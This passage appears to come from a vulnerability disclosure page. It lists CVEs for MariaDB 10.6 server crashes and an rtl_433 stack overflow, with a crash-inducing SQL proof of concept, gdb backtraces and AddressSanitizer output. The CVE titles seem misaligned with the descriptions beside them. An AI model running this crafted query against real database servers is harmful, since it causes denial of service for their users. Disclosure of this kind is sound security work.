
    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1410

#19 0x0000559d3b614807 in handle\_one\_connection (arg=arg@entry=0x608008ba4fb8)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1312

#20 0x0000559d3c45fef0 in pfs\_spawn\_thread (arg=0x617000005b98)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/pfs.cc:2201

#21 0x00007f0f481e3609 in start\_thread (arg=<optimized out>)

    at pthread\_create.c:477

#22 0x00007f0f47db7293 in clone ()

    at ../sysdeps/unix/sysv/linux/x86\_64/clone.S:95

gdb-peda$ quit

CVE-2022-27384: [MDEV-26047] MariaDB server crash at Item_subselect::init_expr_cache_tracker

An issue in the component Field::set_default of MariaDB Server v10.6 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements.

CREATE TEMPORARY TABLE v0 ( v2 TIMESTAMP CHECK ( DEFAULT ( v2 ) IS NOT TRUE ) , v1 TIMESTAMP ) AS SELECT DISTINCT 'x' AS v3 WINDOW CHECKSUM AS ( ) ;

Core was generated by \`/home/supersix/fuzz/security/MariaDB/install/bin/mysqld --defaults-file=/home/s'.

Program terminated with signal SIGSEGV, Segmentation fault.

#0  \_\_pthread\_kill (threadid=<optimized out>, signo=signo@entry=0xb)

    at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

\[Current thread is 1 (Thread 0x7f154c17f300 (LWP 1992265))\]

gdb-peda$ #0  \_\_pthread\_kill (threadid=<optimized out>, signo=signo@entry=0xb)

    at ../sysdeps/unix/sysv/linux/pthread\_kill.c:56

#1  0x00005640d742e98f in my\_write\_core (sig=sig@entry=0xb)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/mysys/stacktrace.c:424

#2  0x00005640d5e9b583 in handle\_fatal\_signal (sig=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/signal\_handler.cc:344

#3  <signal handler called>

#4  0x00005640d5dfe617 in Field::set\_default (this=0x61d0000b9ab8)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/field.cc:2591

#5  0x00005640d5f553a6 in Item\_default\_value::calculate (this=0x6190000f5240)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.cc:9468

#6  0x00005640d5f55466 in Item\_default\_value::val\_real (this=0x6190000f5240)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item.cc:9486

#7  0x00005640d5bbf3bb in Type\_handler\_real\_result::Item\_val\_bool (

    this=<optimized out>, item=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_type.cc:5080

#8  0x00005640d5fa186c in Item\_func\_truth::val\_bool (this=0x6190000f5370)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:1165

#9  Item\_func\_truth::val\_int (this=0x6190000f5370)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/item\_cmpfunc.cc:1188

#10 0x00005640d5966058 in TABLE::verify\_constraints (this=0x6190000f4698,

    ignore\_failure=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/table.cc:6155

#11 0x00005640d5966bbd in TABLE\_LIST::view\_check\_option (this=0x62b000085498,

    thd=<optimized out>, ignore\_failure=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/table.cc:6128

#12 0x00005640d5476284 in select\_insert::send\_data (this=0x62b0000871f0,

    values=...)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_insert.cc:4061

#13 0x00005640d576aafa in select\_result\_sink::send\_data\_with\_check (

    u=0x62b0000823d0, sent=0x0, items=..., this=0x62b0000871f0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_class.h:5609

#14 select\_result\_sink::send\_data\_with\_check (sent=0x0, u=0x62b0000823d0,

    items=..., this=0x62b0000871f0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_class.h:5599

#15 JOIN::exec\_inner (this=0x62b000087340)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:4592

#16 0x00005640d576bd20 in JOIN::exec (this=0x62b000087340)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:4504

#17 0x00005640d5762338 in mysql\_select (thd=0x62b00007e218,

    tables=<optimized out>, fields=..., conds=<optimized out>, og\_num=0x0,

    order=<optimized out>, group=0x0, having=0x0, proc\_param=0x0,

    select\_options=0x20080040b01, result=0x62b0000871f0, unit=0x62b0000823d0,

    select\_lex=0x62b000086138)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:4982

#18 0x00005640d5764425 in handle\_select (thd=thd@entry=0x62b00007e218,

    lex=lex@entry=0x62b000082308, result=result@entry=0x62b0000871f0,

    setup\_tables\_done\_option=setup\_tables\_done\_option@entry=0x0)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_select.cc:544

#19 0x00005640d588eb96 in Sql\_cmd\_create\_table\_like::execute (

    this=<optimized out>, thd=0x62b00007e218)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_table.cc:11746

#20 0x00005640d5591a67 in mysql\_execute\_command (thd=<optimized out>,

    is\_called\_from\_prepared\_stmt=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:5995

#21 0x00005640d55508dd in mysql\_parse (thd=0x62b00007e218,

    rawbuf=<optimized out>, length=<optimized out>,

    parser\_state=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:8028

#22 0x00005640d55862a4 in dispatch\_command (command=COM\_QUERY,

    thd=0x62b00007e218, packet=<optimized out>, packet\_length=<optimized out>,

    blocking=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_class.h:233

#23 0x00005640d558b704 in do\_command (thd=0x62b00007e218,

    blocking=blocking@entry=0x1)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_parse.cc:1406

#24 0x00005640d5a4b14d in do\_handle\_one\_connection (connect=<optimized out>,

    put\_in\_cache=<optimized out>)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1410

#25 0x00005640d5a4c807 in handle\_one\_connection (arg=arg@entry=0x608005322038)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/sql/sql\_connect.cc:1312

#26 0x00005640d6897ef0 in pfs\_spawn\_thread (arg=0x617000005118)

    at /home/supersix/fuzz/security/MariaDB/mariadb-10.6.2/storage/perfschema/pfs.cc:2201

#27 0x00007f155f9fb609 in start\_thread (arg=<optimized out>)

    at pthread\_create.c:477

#28 0x00007f155f5cf293 in clone ()

    at ../sysdeps/unix/sysv/linux/x86\_64/clone.S:95

gdb-peda$ quit

CVE-2022-27381: [MDEV-26061] MariaDB server crash at Field::set_default

rtl_433 21.12 was discovered to contain a stack overflow in the function acurite_00275rm_decode at /devices/acurite.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file.

    ./rtl_433  -d0 -H5 -H20 -f 433.70M -f 433.80M -f 433.90M POC1
    

    SUMMARY: AddressSanitizer: stack-buffer-overflow /home/zxq/CVE_testing/ASAN-install/rtl_433/src/devices/acurite.c:1244 in acurite_00275rm_decode
    Shadow bytes around the buggy address:
      0x100003f00c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100003f00c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100003f00c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100003f00c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100003f00c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x100003f00c60: 00 00 00 00 00 00 00 00 00 00 00[04]f3 f3 f3 f3
      0x100003f00c70: f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3
      0x100003f00c80: f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00
      0x100003f00c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100003f00ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100003f00cb0: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3559329==ABORTING

Tag

#dos